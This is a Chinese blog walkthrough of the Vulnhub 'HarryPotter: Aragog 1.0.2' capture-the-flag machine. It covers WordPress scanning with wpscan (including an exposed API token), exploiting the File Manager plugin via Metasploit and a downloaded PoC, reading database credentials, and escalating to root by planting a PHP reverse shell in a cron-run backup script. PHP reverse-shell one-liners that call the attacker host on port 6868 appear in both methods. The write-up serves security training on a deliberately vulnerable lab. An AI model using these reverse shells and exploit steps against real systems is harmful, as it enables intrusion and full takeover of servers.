Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

过期的秋刀鱼-2023-09-10 9:10

文章目录

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

方式一

信息收集

主机发现

bash 复制代码 
 sudo arp-scan -l

端口扫描

目录扫描

看到这里扫出来目录中,index.htmljavascript , server-status ,blog 下的部分目录,并且出现了wp-login.php ,这也说明了这是一个wordpress的cms框架

index.html

blog

网页没有样式

查看网页源码

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

发现是 WordPress 系统,用 wpscan 扫一下,加上api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

bash 复制代码 
wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具

bash 复制代码 
msf6 > search wordpress file manager
bash 复制代码 
use 1
info

查看需要配置的信息

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

hagrid98家目录下得到一串base64格式加密的数据

使用BurpSuiteDecoder功能解码

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell 变成了交互式shell),输入下面命令即可拿到tty shell

使用得到用户名root,密码mySecr3tPass,来连接数据库

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

在线解密网站

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

root提权

使用sudo suid查询后发现没有可利用的

然后查找备份文件,查看有没有.sh结尾的文件

bash 复制代码 
find / -name '*.sh'

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

php 复制代码 
<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell

kali监听6868端口

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

方式二

信息收集

gobuster扫描

bash 复制代码 
└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

wpscan扫描

bash 复制代码 
wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

生成反弹 shell写入到payload.php文件里

php 复制代码 
php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

运行脚本,得到反弹shell地址

地址中多写了一个/blog,删除即可

等一会就反弹到了

相关推荐
熙丫 133814823861 分钟前
CISAW-RM风险管理认证培训|2026年度课程计划全面发布:筑牢安全防线
运维·安全
玥轩_52111 分钟前
防火墙技术-综合应用实验
运维·网络·网络协议·网络安全·智能路由器·路由器·防火墙
程序员哈基耄13 分钟前
隐私与安全工具集:纯粹、安全、可控的本地化隐私解决方案
安全
智驱力人工智能37 分钟前
无人机河道漂浮物检测 从项目构建到价值闭环的系统工程 无人机河道垃圾识别 农村河道漂浮物智能清理方案 无人机辅助河道清洁预警
opencv·算法·安全·yolo·目标检测·无人机·边缘计算
是垚不是土1 小时前
MySQL8.0数据库GTID主从同步方案
android·网络·数据库·安全·adb
Ancelin安心1 小时前
关于代理的一些网络知识复盘
linux·运维·网络·计算机网络·web安全·ubuntu·网络安全
缘友一世1 小时前
现代密码学【3】之密码学形式化分析与可证明安全基础
安全·密码学·概率论
重生之我在番茄自学网安拯救世界1 小时前
网络安全中级阶段学习笔记(十一):服务器解析漏洞全解析(原理、利用与防御)
运维·服务器·web安全·网络安全·渗透测试·服务器解析漏洞
重生之我在番茄自学网安拯救世界1 小时前
网络安全中级阶段学习笔记(十二):PHP 文件包含漏洞全解析(原理 + 利用 + 防御 )
笔记·学习·web安全·文件包含漏洞·网安基础
小句2 小时前
前后端安全数据处理方案设计
安全
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Labelme从安装到标注:零基础完整指南07CentOS的ISO镜像下载08BongoCat - 跨平台键盘猫动画工具09jdk21下载、安装(Windows、Linux、macOS)10NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南